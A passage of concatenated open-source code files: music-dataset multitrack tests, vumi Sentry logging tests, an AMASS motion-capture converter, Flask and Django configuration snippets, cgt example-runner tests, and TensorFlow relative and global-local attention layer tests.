self.assertEqual(actual, expected)
def test_raw_duration(self):
actual = self.raw.duration
expected = None
self.assertEqual(actual, expected)
def test_raw_fname(self):
actual = os.path.basename(self.raw.audio_path)
expected = "NightPanther_Fire_RAW_08_01.wav"
self.assertEqual(actual, expected)
def test_raw_instrument(self):
actual = self.raw.instrument
expected = ["cymbal"]
self.assertEqual(actual, expected)
def test_raw_f0type(self):
actual = self.raw.f0_type
expected = ["u"]
self.assertEqual(actual, expected)
def test_raw_mixpath(self):
actual = os.path.basename(self.raw.mix_path)
expected = "NightPanther_Fire_MIX.wav"
self.assertEqual(actual, expected)
def test_raw_pitch_annotation(self):
actual = self.raw.pitch_annotation
expected = None
self.assertEqual(actual, expected)
def test_raw_raw_idx(self):
actual = self.raw.raw_idx
expected = 1
self.assertEqual(actual, expected)
def test_raw_stem_idx(self):
actual = self.raw.stem_idx
expected = 8
self.assertEqual(actual, expected)
def test_stem_instruments(self):
actual = self.mtrack.stem_instruments
expected = [
'auxiliary percussion',
'brass section',
'drum machine',
'drum set',
'electric bass',
'male singer',
'string section',
'synthesizer',
'synthesizer',
'synthesizer',
'vocalists',
'vocalists',
]
print(actual)
self.assertEqual(actual, expected)
def test_raw_instruments_length(self):
actual = len(self.mtrack.raw_instruments)
expected = 55
self.assertEqual(actual, expected)
def test_raw_instruments(self):
actual = self.mtrack.raw_instruments[0:5]
expected = [
'brass section',
'brass section',
'brass section',
'brass section',
'cello'
]
self.assertEqual(actual, expected)
def test_has_melody(self):
actual = self.mtrack.has_melody
expected = True
self.assertEqual(actual, expected)
def test_predominant_stem_type(self):
actual = type(self.mtrack.predominant_stem)
expected = multitrack.Track
self.assertEqual(actual, expected)
def test_predominant_stem_component(self):
actual = self.mtrack.predominant_stem.component
expected = 'melody'
self.assertEqual(actual, expected)
def test_predominant_stem_stem_idx(self):
actual = self.mtrack.predominant_stem.stem_idx
expected = 7
self.assertEqual(actual, expected)
def test_melody_annotations(self):
actual_mel1 = self.mtrack.melody1_annotation
actual_mel2 = self.mtrack.melody2_annotation
actual_mel3 = self.mtrack.melody3_annotation
self.assertEqual(len(actual_mel1), 36692)
self.assertEqual(len(actual_mel2), 36692)
self.assertEqual(len(actual_mel3), 36692)
self.assertEqual(len(actual_mel1[0]), 2)
self.assertEqual(len(actual_mel2[0]), 2)
self.assertEqual(len(actual_mel3[0]), 3)
def test_melody_tracks(self):
mel_tracks = self.mtrack.melody_stems()
self.assertEqual(len(mel_tracks), 2)
self.assertEqual(mel_tracks[0].component, 'melody')
self.assertEqual(mel_tracks[0].stem_idx, 6)
self.assertEqual(len(mel_tracks[0].pitch_annotation), 6591)
def test_bass_tracks(self):
bass_tracks = self.mtrack.bass_stems()
self.assertEqual(len(bass_tracks), 1)
self.assertEqual(bass_tracks[0].component, 'bass')
self.assertEqual(bass_tracks[0].stem_idx, 1)
def test_num_stems(self):
actual = self.mtrack.num_stems()
expected = 12
self.assertEqual(actual, expected)
def test_num_raw(self):
actual = self.mtrack.num_raw()
expected = 55
self.assertEqual(actual, expected)
def test_stem_filepaths(self):
actual = len(self.mtrack.stem_filepaths())
expected = 12
self.assertEqual(actual, expected)
def test_raw_filepaths(self):
actual = len(self.mtrack.raw_filepaths())
expected = 55
self.assertEqual(actual, expected)
def test_stem_activations(self):
actual = self.mtrack.stem_activations
self.assertEqual(type(actual), list)
def test_stem_activations_v2(self):
actual = self.mtrack.stem_activations_v2
self.assertEqual(type(actual), list)
def test_activation_conf_from_stem1(self):
actual = self.mtrack.activation_conf_from_stem(3)[0]
expected = [0.0, 0.0474]
self.assertEqual(actual, expected)
def test_activation_conf_from_stem_v2(self):
actual = self.mtrack.activation_conf_from_stem(3, version='v2')[0]
expected = [0.0, 0.0474]
self.assertEqual(actual, expected)
def test_activation_conf_from_stem2(self):
actual = self.mtrack.activation_conf_from_stem(50)
expected = None
self.assertEqual(actual, expected)
def test_get_mixing_coefficient(self):
mtrack = multitrack.MultiTrack('AClassicEducation_NightOwl')
actual = mtrack._get_mixing_coefficient(3)
expected = 0.2
self.assertEqual(actual, expected)
def test_get_mixing_coefficient2(self):
actual = self.mtrack2._get_mixing_coefficient(3)
expected = 0.585016969071061
self.assertAlmostEqual(actual, expected)
class TestTrack(unittest.TestCase):
def test_track(self):
track = multitrack.Track(
'blurbophone', 'fake/path1', 'S12', 'fake/path2',
component='melody'
)
self.assertEqual(track.instrument, ['blurbophone'])
self.assertEqual(track.audio_path, 'fake/path1')
self.assertEqual(track.component, 'melody')
self.assertEqual(track.stem_idx, 12)
self.assertEqual(track.raw_idx, None)
self.assertEqual(track.mix_path, 'fake/path2')
self.assertEqual(track.pitch_path, None)
def test_track2(self):
track = multitrack.Track(
'kazoo', 'fake/path1', 50, 'fake/path2',
raw_idx='R07'
)
self.assertEqual(track.instrument, ['kazoo'])
self.assertEqual(track.audio_path, 'fake/path1')
self.assertEqual(track.component, '')
self.assertEqual(track.stem_idx, 50)
self.assertEqual(track.raw_idx, 7)
self.assertEqual(track.mix_path, 'fake/path2')
def test_track_equality(self):
track1 = multitrack.Track(
'blurbophone', 'fake/path1', 'S12', 'fake/path2',
component='melody'
)
track2 = multitrack.Track(
'blurbophone', 'fake/path1', 'S12', 'fake/path2',
component='melody'
)
actual = track1 == track2
expected = True
self.assertEqual(expected, actual)
def test_track_inequality(self):
track1 = multitrack.Track(
'blurbophone', 'fake/path1', 'S12', 'fake/path2',
component='melody'
)
track2 = multitrack.Track(
'kazoo', 'fake/path1', 50, 'fake/path2',
raw_idx='R07'
)
actual = track1 != track2
expected = True
self.assertEqual(expected, actual)
class TestPathBasedir(unittest.TestCase):
def test_basedir(self):
path = 'this/is/a/path'
actual = multitrack._path_basedir(path)
expected = 'path'
self.assertEqual(actual, expected)
def test_basedir2(self):
path = 'this/is/a/second/path/'
actual = multitrack._path_basedir(path)
expected = 'path'
self.assertEqual(actual, expected)
def test_basedir3(self):
path = 'this/is/a/path/with/an/ending/file.txt'
actual = multitrack._path_basedir(path)
expected = 'file.txt'
self.assertEqual(actual, expected)
class TestGetDictLeaves(unittest.TestCase):
def test_get_leaves(self):
test_dict = {
'a': ['z', 'y', 'x'],
'b': ['w', 't'],
'c': ['elephant'],
'd': {'asdf': ['z']},
'e': {'borg': ['foo']}
}
actual = multitrack.get_dict_leaves(test_dict)
expected = set(['z', 'y', 'x', 'w', 't', 'elephant', 'foo'])
self.assertEqual(actual, expected)
def test_get_leaves2(self):
mtrack = multitrack.MultiTrack('NightPanther_Fire')
test_dict = {
'a': mtrack,
'b': {1: mtrack, 2: mtrack},
'c': [mtrack],
'd': {'asdf': mtrack},
'e': {'borg': [mtrack]}
}
actual = multitrack.get_dict_leaves(test_dict)
expected = set([mtrack, mtrack, mtrack, mtrack, mtrack])
self.assertEqual(actual, expected)
class TestGetDuration(unittest.TestCase):
def test_get_duration(self):
actual = multitrack.get_duration(os.path.join(
os.path.dirname(__file__), 'data/short_audio.wav'))
expected = 4.0
self.assertEqual(actual, expected)
class TestReadAnnotationFile(unittest.TestCase):
def test_readpitch(self):
actual, header = multitrack.read_annotation_file(
os.path.join(os.path.dirname(__file__), 'data/pitch.csv')
)
expected = [
[0.023219954, 189.187],
[0.029024943, 191.782],
[0.034829931, 200.344]
]
self.assertEqual(actual, expected)
self.assertEqual(header, [])
def test_readmelody(self):
actual, header = multitrack.read_annotation_file(
os.path.join(os.path.dirname(__file__), 'data/melody.csv')
)
expected = [
[0.0, 0.0],
[0.0058049886621315194, 0.0],
[0.011609977324263039, 0.0],
[0.017414965986394557, 0.0],
[0.023219954648526078, 189.18700000000001]
]
self.assertEqual(actual, expected)
self.assertEqual(header, [])
def test_invalidpath(self):
actual, header = multitrack.read_annotation_file('blurb/blork/barg')
expected = None
self.assertEqual(actual, expected)
self.assertEqual(header, expected)
class TestGetValidInstrumentLabels(unittest.TestCase):
def setUp(self):
self.labels = multitrack.get_valid_instrument_labels()
test_taxonomy_fpath = os.path.join(
os.path.dirname(__file__), 'data/test_taxonomy.yaml')
with open(test_taxonomy_fpath, 'r') as fhandle:
self.test_taxonomy = yaml.load(fhandle)
def test_inclusion(self):
self.assertTrue('female singer' in self.labels)
def test_inclusion2(self):
self.assertTrue('erhu' in self.labels)
def test_exclusion(self):
self.assertFalse('squidward' in self.labels)
def test_alternate_taxonomy(self):
actual = multitrack.get_valid_instrument_labels(
taxonomy=self.test_taxonomy
)
expected = set([
'rick',
'morty',
'beth',
'summer',
'jerry',
'mrs pancakes',
'tiny rick',
'squanchy',
'traflorkians',
'unity'
])
self.assertEqual(actual, expected)
class TestIsValidInstrument(unittest.TestCase):
def test_valid_instrument(self):
actual = multitrack.is_valid_instrument('clarinet')
expected = True
self.assertEqual(actual, expected)
def test_invalid_instrument(self):
actual = multitrack.is_valid_instrument('Clarinet')
expected = False
self.assertEqual(actual, expected)
def test_invalid_instrument2(self):
actual = multitrack.is_valid_instrument('mayonnaise')
expected = False
self.assertEqual(actual, expected)
class TestGetDatasetVersion(unittest.TestCase):
def test_version_1(self):
actual = multitrack.get_dataset_version('MusicDelta_Beethoven')
expected = 'V1'
self.assertEqual(expected, actual)
def test_version_v2(self):
actual = multitrack.get_dataset_version("FennelCartwright_DearTessie")
expected = 'V2'
self.assertEqual(expected, actual)
def test_version_extra(self):
actual = multitrack.get_dataset_version("AHa_TakeOnMe")
expected = 'EXTRA'
self.assertEqual(expected, actual)
def test_version_bach10(self):
actual = multitrack.get_dataset_version("Bach10_05DieNacht")
expected = 'BACH10'
self.assertEqual(expected, actual)
def test_version_none(self):
actual = multitrack.get_dataset_version("ManateeCommune_Blueberry")
expected = ''
self.assertEqual(expected, actual)
|
projects/manipulathor_baselines/armpointnav_baselines/models/base_models.py | brandontrabucco/allenact | 187 | 12716528 | <filename>projects/manipulathor_baselines/armpointnav_baselines/models/base_models.py
import torch
import torch.nn as nn
class LinearActorHeadNoCategory(nn.Module):
def __init__(self, num_inputs: int, num_outputs: int):
super().__init__()
self.linear = nn.Linear(num_inputs, num_outputs)
nn.init.orthogonal_(self.linear.weight, gain=0.01)
nn.init.constant_(self.linear.bias, 0)
def forward(self, x: torch.FloatTensor): # type: ignore
x = self.linear(x) # type:ignore
assert len(x.shape) == 3
return x
|
vumi/tests/test_sentry.py | seidu626/vumi | 199 | 12716536 | """Tests for vumi.sentry."""
import logging
import base64
import json
import sys
import traceback
from twisted.internet.defer import inlineCallbacks, Deferred
from twisted.web import http
from twisted.python.failure import Failure
from twisted.python.log import LogPublisher
from vumi.tests.utils import MockHttpServer, LogCatcher
from vumi.sentry import (quiet_get_page, SentryLogObserver, vumi_raven_client,
SentryLoggerService)
from vumi.tests.helpers import VumiTestCase, import_skip
class TestQuietGetPage(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.mock_http = MockHttpServer(self._handle_request)
self.add_cleanup(self.mock_http.stop)
yield self.mock_http.start()
def _handle_request(self, request):
request.setResponseCode(http.OK)
request.do_not_log = True
return "Hello"
@inlineCallbacks
def test_request(self):
with LogCatcher() as lc:
result = yield quiet_get_page(self.mock_http.url)
self.assertEqual(lc.logs, [])
self.assertEqual(result, "Hello")
class DummySentryClient(object):
def __init__(self):
self.exceptions = []
self.messages = []
self.teardowns = 0
def captureMessage(self, *args, **kwargs):
self.messages.append((args, kwargs))
def captureException(self, *args, **kwargs):
self.exceptions.append((args, kwargs))
def teardown(self):
self.teardowns += 1
class TestSentryLogObserver(VumiTestCase):
def setUp(self):
self.client = DummySentryClient()
self.obs = SentryLogObserver(self.client, 'test', "worker-1")
def test_level_for_event(self):
for expected_level, event in [
(logging.WARN, {'logLevel': logging.WARN}),
(logging.ERROR, {'isError': 1}),
(logging.INFO, {}),
]:
self.assertEqual(self.obs.level_for_event(event), expected_level)
def test_logger_for_event(self):
self.assertEqual(self.obs.logger_for_event({'system': 'foo,bar'}),
'test.foo.bar')
self.assertEqual(self.obs.logger_for_event({}), 'test')
def test_log_failure(self):
e = ValueError("foo error")
f = Failure(e)
self.obs({'failure': f, 'system': 'foo', 'isError': 1})
self.assertEqual(self.client.exceptions, [
(((type(e), e, None),),
{'data': {'level': 40, 'logger': 'test.foo'},
'tags': {'worker-id': 'worker-1'}}),
])
def test_log_traceback(self):
try:
raise ValueError("foo")
except ValueError:
f = Failure(*sys.exc_info())
self.obs({'failure': f, 'isError': 1})
[call_args] = self.client.exceptions
exc_info = call_args[0][0]
tb = ''.join(traceback.format_exception(*exc_info))
self.assertTrue('raise ValueError("foo")' in tb)
def test_log_warning(self):
self.obs({'message': ["a"], 'system': 'foo',
'logLevel': logging.WARN})
self.assertEqual(self.client.messages, [
(('a',),
{'data': {'level': 30, 'logger': 'test.foo'},
'tags': {'worker-id': 'worker-1'}})
])
def test_log_info(self):
self.obs({'message': ["a"], 'system': 'test.log'})
self.assertEqual(self.client.messages, []) # should be filtered out
class TestSentryLoggerSerivce(VumiTestCase):
def setUp(self):
import vumi.sentry
self.client = DummySentryClient()
self.patch(vumi.sentry, 'vumi_raven_client', lambda dsn: self.client)
self.logger = LogPublisher()
self.service = SentryLoggerService("http://example.com/",
"test.logger",
"worker-1",
logger=self.logger)
@inlineCallbacks
def test_logging(self):
yield self.service.startService()
self.logger.msg("Hello", logLevel=logging.WARN)
self.assertEqual(self.client.messages, [
(("Hello",),
{'data': {'level': 30, 'logger': 'test.logger'},
'tags': {'worker-id': 'worker-1'}})
])
del self.client.messages[:]
yield self.service.stopService()
self.logger.msg("Foo", logLevel=logging.WARN)
self.assertEqual(self.client.messages, [])
@inlineCallbacks
def test_stop_not_running(self):
yield self.service.stopService()
self.assertFalse(self.service.running)
@inlineCallbacks
def test_start_stop(self):
self.assertFalse(self.service.registered())
self.assertEqual(self.client.teardowns, 0)
yield self.service.startService()
self.assertTrue(self.service.registered())
yield self.service.stopService()
self.assertFalse(self.service.registered())
self.assertEqual(self.client.teardowns, 1)
class TestRavenUtilityFunctions(VumiTestCase):
def setUp(self):
try:
import raven
raven # To keep pyflakes happy.
except ImportError, e:
import_skip(e, 'raven')
def mk_sentry_dsn(self):
proj_user = "4c96ae4ca518483192dd9917c03847c4"
proj_key = "<KEY>"
proj_no = 2
host, port = "example.com", "30000"
dsn = "http://%s:%s@%s:%s/%s" % (proj_user, proj_key, host, port,
proj_no)
return dsn
def parse_call(self, sentry_call):
args, kwargs = sentry_call
postdata = kwargs['postdata']
return json.loads(base64.b64decode(postdata).decode('zlib'))
def test_vumi_raven_client_capture_message(self):
import vumi.sentry
dsn = self.mk_sentry_dsn()
call_history = []
def fake_get_page(*args, **kw):
call_history.append((args, kw))
return Deferred()
self.patch(vumi.sentry, 'quiet_get_page', fake_get_page)
client = vumi_raven_client(dsn)
client.captureMessage("my message")
[sentry_call] = call_history
sentry_data = self.parse_call(sentry_call)
self.assertEqual(sentry_data['message'], "my message")
|
mmhuman3d/data/data_converters/amass.py | ykk648/mmhuman3d | 472 | 12716545 | <gh_stars>100-1000
import glob
import os
import numpy as np
from tqdm import tqdm
from mmhuman3d.data.data_structures.human_data import HumanData
from .base_converter import BaseConverter
from .builder import DATA_CONVERTERS
all_sequences = [
'ACCAD',
'BioMotionLab_NTroje',
'CMU',
'EKUT',
'Eyes_Japan_Dataset',
'HumanEva',
'KIT',
'MPI_HDM05',
'MPI_Limits',
'MPI_mosh',
'SFU',
'SSM_synced',
'TCD_handMocap',
'TotalCapture',
'Transitions_mocap',
]
@DATA_CONVERTERS.register_module()
class AmassConverter(BaseConverter):
"""AMASS dataset
`AMASS: Archive of Motion Capture as Surface Shapes' ICCV`2019
More details can be found in the `paper
<https://files.is.tue.mpg.de/black/papers/amass.pdf>`__.
"""
def convert(self, dataset_path: str, out_path: str) -> dict:
"""
Args:
dataset_path (str): Path to directory where raw images and
annotations are stored.
out_path (str): Path to directory to save preprocessed npz file
Returns:
dict:
A dict containing keys video_path, smplh, meta, frame_idx
stored in HumanData() format
"""
# use HumanData to store all data
human_data = HumanData()
# structs we use
video_path_, frame_idx_ = [], []
smplh = {}
smplh['body_pose'] = []
smplh['global_orient'] = []
smplh['betas'] = []
smplh['transl'] = []
smplh['left_hand_pose'] = []
smplh['right_hand_pose'] = []
meta = {}
meta['gender'] = []
annot_dir = dataset_path
for seq_name in tqdm(all_sequences):
seq_folder = os.path.join(annot_dir, seq_name)
subjects = os.listdir(seq_folder)
for subject in tqdm(subjects):
pattern = os.path.join(seq_folder, subject, '*.npz')
action_list = sorted(glob.glob(pattern))
for action_file in action_list:
if action_file.endswith('shape.npz'):
continue
data = np.load(action_file)
# get smpl data
gender = data['gender']
betas = data['betas'][:10].reshape((-1, 10))
trans = data['trans'].reshape((-1, 3))
root_orient = data['poses'][:, :3]
pose_body = data['poses'][:, 3:66].reshape((-1, 21, 3))
pose_hand = data['poses'][:, 66:]
left_hand_pose = pose_hand[:, :45].reshape(-1, 15, 3)
right_hand_pose = pose_hand[:, 45:].reshape(-1, 15, 3)
# get video file
action_name = action_file.split('/')[-1].split('_poses')[0]
vid_id = os.path.join(seq_name, subject,
action_name + '.mp4')
mocap_framerate = int(data['mocap_framerate'])
sampling_freq = mocap_framerate // 10
num_frames = pose_body.shape[0]
for i in range(num_frames):
if i % sampling_freq != 0:
continue
smplh['body_pose'].append(pose_body[i])
smplh['global_orient'].append(root_orient[i])
smplh['betas'].append(betas)
smplh['transl'].append(trans[i])
smplh['left_hand_pose'].append(left_hand_pose[i])
smplh['right_hand_pose'].append(right_hand_pose[i])
meta['gender'].append(gender)
video_path_.append(vid_id)
frame_idx_.append(i)
# change list to np array
smplh['body_pose'] = np.array(smplh['body_pose']).reshape((-1, 21, 3))
smplh['global_orient'] = np.array(smplh['global_orient']).reshape(
(-1, 3))
smplh['betas'] = np.array(smplh['betas']).reshape((-1, 10))
smplh['transl'] = np.array(smplh['transl']).reshape((-1, 3))
smplh['left_hand_pose'] = np.array(smplh['left_hand_pose']).reshape(
(-1, 15, 3))
smplh['right_hand_pose'] = np.array(smplh['right_hand_pose']).reshape(
(-1, 15, 3))
meta['gender'] = np.array(meta['gender'])
human_data['video_path'] = video_path_
human_data['frame_idx'] = np.array(frame_idx_).reshape(-1)
human_data['meta'] = meta
human_data['config'] = 'amass'
human_data['smplh'] = smplh
# store data
if not os.path.isdir(out_path):
os.makedirs(out_path)
file_name = 'amass.npz'
out_file = os.path.join(out_path, file_name)
human_data.dump(out_file)
|
config.py | masonsxu/red-flask | 161 | 12716546 | <reponame>masonsxu/red-flask<gh_stars>100-1000
# -*- coding: utf-8 -*-
# @ Time : 2020/9/8 14:56
# @ Author : Redtree
# @ File : config.py
# @ Desc :
VERSION = 'V0.1'
'''
database_setting
'''
DIALCT = "mysql"
DRIVER = "pymysql"
USERNAME = "mysql-username"
PASSWORD = "<PASSWORD>"
HOST = "数据库连接地址"
PORT = "数据库服务端口"
DATABASE = "testdb"
DB_URI = "{}+{}://{}:{}@{}:{}/{}?charset=utf8".format(DIALCT,DRIVER,USERNAME,PASSWORD,HOST,PORT,DATABASE)
SQLALCHEMY_DATABASE_URI = DB_URI
SQLALCHEMY_POOL_SIZE = 5
SQLALCHEMY_POOL_TIMEOUT = 30
SQLALCHEMY_POOL_RECYCLE = 3600
SQLALCHEMY_MAX_OVERFLOW = 5
SQLALCHEMY_TRACK_MODIFICATIONS = False
'''
Flask-SQLAlchemy有自己的事件通知系统,该系统在SQLAlchemy之上分层。为此,它跟踪对SQLAlchemy会话的修改。
这会占用额外的资源,因此该选项SQLALCHEMY_TRACK_MODIFICATIONS允许你禁用修改跟踪系统。
当前,该选项默认为True,但将来该默认值将更改为False,从而禁用事件系统。
'''
'''
WEB SETTINT
'''
WEB_IP = 'localhost'
WEB_PORT = '5000'
#字符串编码格式
STRING_CODE = 'utf-8'
#加密方式名
ENCRYPTION_SHA1 = 'sha1'
#token过期时间配置(默认一周 604800/测试的时候5分钟)
TOKEN_EXPIRE = 604800
'''
db-select-habit
'''
USER_SALT_LENGTH = 4
PAGE_LIMIT = 10
DEFAULT_PAGE = 1 |
AutotestWebD/apps/littletool/views/tool.py | yangjourney/sosotest | 422 | 12716561 | <reponame>yangjourney/sosotest<filename>AutotestWebD/apps/littletool/views/tool.py
from django.shortcuts import render,HttpResponse
def jsoncn(request):
print(str(request))
context = {"jsonstr":request.GET.get("json","")}
return render(request, "littletool/jsoncn.html", context)
|
back/restapi/apps.py | ramonakira/piclodio3 | 120 | 12716587 | import sys
from django.apps import AppConfig
from utils.scheduler_manager import SchedulerManager
class RestapiConfig(AppConfig):
name = 'restapi'
def __init__(self, app_name, app_module):
super().__init__(app_name, app_module)
def ready(self):
argv = sys.argv
print(argv)
list_banned_argument = ["makemigrations", "migrate", "collectstatic", "dumpdata", "loaddata"]
if not any(x in list_banned_argument for x in argv):
# start the scheduler
scheduler_manager = SchedulerManager()
scheduler_manager.start()
# active signals
import restapi.signals
|
cgt/tests/test_examples.py | rohanraja/cgt_distributed | 698 | 12716589 | <reponame>rohanraja/cgt_distributed<gh_stars>100-1000
import subprocess, os.path as osp
from nose.plugins.skip import SkipTest
thisdir = osp.dirname(__file__)
def run_example(cmd, filedepends=None):
if filedepends and not osp.exists(filedepends):
raise SkipTest(cmd)
else:
subprocess.check_call(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def skip_example(cmd):
raise SkipTest(cmd)
def test_examples():
mnist = "%s/../../downloads/mnist.npz"%thisdir
cifar = "%s/../../downloads/cifar10.npz"%thisdir
yield run_example, "CGT_FLAGS=backend=python python %s/../../examples/demo_mnist.py --unittest"%thisdir, mnist
yield run_example, "CGT_FLAGS=backend=native python %s/../../examples/demo_mnist.py --unittest"%thisdir,mnist
yield run_example, "python %s/../../examples/cgt_theano_feedforward_comparison.py --unittest"%thisdir,mnist
yield run_example, "CGT_FLAGS=backend=native python %s/../../examples/demo_cifar.py --unittest"%thisdir,cifar
yield run_example, "cd %s/../../examples/ && CGT_FLAGS=backend=native python demo_char_rnn.py --unittest"%thisdir
yield run_example, "CGT_FLAGS=backend=native python %s/../../examples/demo_neural_turing_machine.py --unittest"%thisdir
runipycmd = "runipy %s/../../examples/tutorial.ipynb"%thisdir
try:
import graphviz
yield run_example, runipycmd
except ImportError:
yield skip_example, runipycmd
if __name__ == "__main__":
import nose
nose.runmodule() |
etcmodel/layers/attention_test.py | deepneuralmachine/google-research | 23,901 | 12716616 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for attention layers."""
from absl.testing import parameterized
import numpy as np
import tensorflow as tf
from etcmodel import layers as etc_layers
# `attention` module used for testing `_expand_local_ids_to_blocks` helper.
from etcmodel.layers import attention
class LayersTest(tf.test.TestCase, parameterized.TestCase):
def assert_all_identical(self, *elements):
if not elements:
return
first_element = elements[0]
for element in elements[1:]:
self.assertIs(element, first_element)
@parameterized.named_parameters(
('using_gather', False),
('using_one_hot', True),
)
def test_relative_attention(self, use_one_hot_lookup):
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 3
from_seq_len = 16
to_seq_len = 17
num_heads = 5
from_hidden_size = 11
to_hidden_size = 12
output_hidden_size = 13
total_key_size = 10
total_value_size = 15
relative_vocab_size = 21
from_seq = tf.random.normal([batch_size, from_seq_len, from_hidden_size])
to_seq = tf.random.normal([batch_size, to_seq_len, to_hidden_size])
att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, from_seq_len, to_seq_len]))
relative_att_ids = tf.random.uniform([batch_size, from_seq_len, to_seq_len],
maxval=relative_vocab_size,
dtype=tf.int32)
layer = etc_layers.RelativeAttention(
hidden_size=output_hidden_size,
num_heads=num_heads,
total_key_size=total_key_size,
total_value_size=total_value_size,
relative_vocab_size=relative_vocab_size,
use_one_hot_lookup=use_one_hot_lookup)
result = layer(
from_seq=from_seq,
to_seq=to_seq,
att_mask=att_mask,
relative_att_ids=relative_att_ids)
self.assertAllEqual([batch_size, from_seq_len, output_hidden_size],
result.shape)
@parameterized.named_parameters(
('using_gather', False),
('using_one_hot', True),
)
def test_relative_attention_self_attention(self, use_one_hot_lookup):
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 3
seq_len = 16
num_heads = 5
input_hidden_size = 11
output_hidden_size = 12
total_key_size = 10
total_value_size = 15
relative_vocab_size = 21
inputs = tf.constant(
np.random.normal(size=[batch_size, seq_len, input_hidden_size]),
tf.float32)
att_mask = tf.constant(
np.random.binomial(n=1, p=0.9, size=[batch_size, seq_len, seq_len]))
relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size, size=[batch_size, seq_len, seq_len]))
layer = etc_layers.RelativeAttention(
hidden_size=output_hidden_size,
num_heads=num_heads,
total_key_size=total_key_size,
total_value_size=total_value_size,
relative_vocab_size=relative_vocab_size,
use_one_hot_lookup=use_one_hot_lookup)
result1 = layer(
inputs, att_mask=att_mask, relative_att_ids=relative_att_ids)
self.assertAllEqual([batch_size, seq_len, output_hidden_size],
result1.shape)
result2 = layer(
from_seq=inputs,
to_seq=inputs,
att_mask=att_mask,
relative_att_ids=relative_att_ids)
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllEqual(result1, result2)
@parameterized.named_parameters(
('using_gather', False),
('using_one_hot', True),
)
def test_relative_attention_shared_sublayers(self, use_one_hot_lookup):
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 3
from_seq_len = 16
to_seq_len = 17
num_heads = 5
from_hidden_size = 11
to_hidden_size = 12
output_hidden_size = 13
total_key_size = 10
total_value_size = 15
relative_vocab_size = 9
from_seq = tf.constant(
np.random.random(size=[batch_size, from_seq_len, from_hidden_size]))
to_seq = tf.constant(
np.random.random(size=[batch_size, to_seq_len, to_hidden_size]))
att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, from_seq_len, to_seq_len]))
layer = etc_layers.RelativeAttention(
hidden_size=output_hidden_size,
num_heads=num_heads,
total_key_size=total_key_size,
total_value_size=total_value_size,
relative_vocab_size=relative_vocab_size,
use_one_hot_lookup=use_one_hot_lookup)
sharing_layer = etc_layers.RelativeAttention(
hidden_size=output_hidden_size,
num_heads=num_heads,
total_key_size=total_key_size,
total_value_size=total_value_size,
query_projection=layer.query_projection,
key_projection=layer.key_projection,
value_projection=layer.value_projection,
qkv_relative_attention=layer.qkv_relative_attention,
output_projection=layer.output_projection)
different_layer = etc_layers.RelativeAttention(
hidden_size=output_hidden_size,
num_heads=num_heads,
total_key_size=total_key_size,
total_value_size=total_value_size,
relative_vocab_size=relative_vocab_size,
use_one_hot_lookup=use_one_hot_lookup)
result1 = layer(
from_seq=from_seq,
to_seq=to_seq,
att_mask=att_mask,
relative_att_ids=None)
result2 = sharing_layer(
from_seq=from_seq,
to_seq=to_seq,
att_mask=att_mask,
relative_att_ids=None)
result3 = different_layer(
from_seq=from_seq,
to_seq=to_seq,
att_mask=att_mask,
relative_att_ids=None)
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllEqual(result1, result2)
self.assertNotAllClose(result1, result3)
def test_fused_global_local_attention_special_case_equivalence(self):
# To test for correctness, we make sure the output is equivalent to
# standard attention in the special case where `local_radius` covers the
# entire long sequence length and projection weights are shared.
# For simplicity, we don't use attention masks or relative attention ids
# in this test.
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 3
long_seq_len = 12
global_seq_len = 6
hidden_size = 10
num_heads = 5
local_radius = 15 # Must be >= `long_seq_len - 1` to remove sparsity.
# relative_vocab_size = 9
long_input = tf.constant(
np.random.normal(size=[batch_size, long_seq_len, hidden_size]))
global_input = tf.constant(
np.random.normal(size=[batch_size, global_seq_len, hidden_size]))
fused_att_layer = etc_layers.FusedGlobalLocalAttention(
long_hidden_size=hidden_size,
global_hidden_size=hidden_size,
num_heads=num_heads,
local_radius=local_radius,
share_qkv_projections=True,
share_att_output_projection=True)
long_output, global_output = fused_att_layer(
long_input,
global_input,
att_implementation='sparse')
# [batch_size, long_seq_len + global_seq_len, hidden_size]
fused_output = tf.concat([long_output, global_output], axis=1)
# Create concatenated input for standard attention.
# [batch_size, long_seq_len + global_seq_len, hidden_size]
concat_input = tf.concat([long_input, global_input], axis=1)
standard_att_layer = etc_layers.RelativeAttention(
hidden_size=hidden_size,
num_heads=num_heads,
query_projection=fused_att_layer.long_query_projection,
key_projection=fused_att_layer.l2l_key_projection,
value_projection=fused_att_layer.l2l_value_projection,
output_projection=fused_att_layer.long_output_projection)
expected_output = standard_att_layer(concat_input)
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllClose(expected_output, fused_output)
# Make sure 'full' att_implementation gives the same output.
long_output_full_att, global_output_full_att = fused_att_layer(
long_input,
global_input,
att_implementation='full')
self.assertAllClose(long_output, long_output_full_att)
self.assertAllClose(global_output, global_output_full_att)
@parameterized.named_parameters(
dict(testcase_name='share_nothing'),
dict(testcase_name='share_kv_projections', share_kv_projections=True),
dict(testcase_name='share_qkv_projections', share_qkv_projections=True),
dict(
testcase_name='share_qkv_projections_supersedes_kv',
share_kv_projections=True,
share_qkv_projections=True),
dict(
testcase_name='share_att_output_projection',
share_att_output_projection=True),
dict(
testcase_name='share_everything',
share_qkv_projections=True,
share_att_output_projection=True),
)
def test_fused_global_local_attention_shared_sublayers(
self,
share_kv_projections=False,
share_qkv_projections=False,
share_att_output_projection=False):
hidden_size = 10
layer = etc_layers.FusedGlobalLocalAttention(
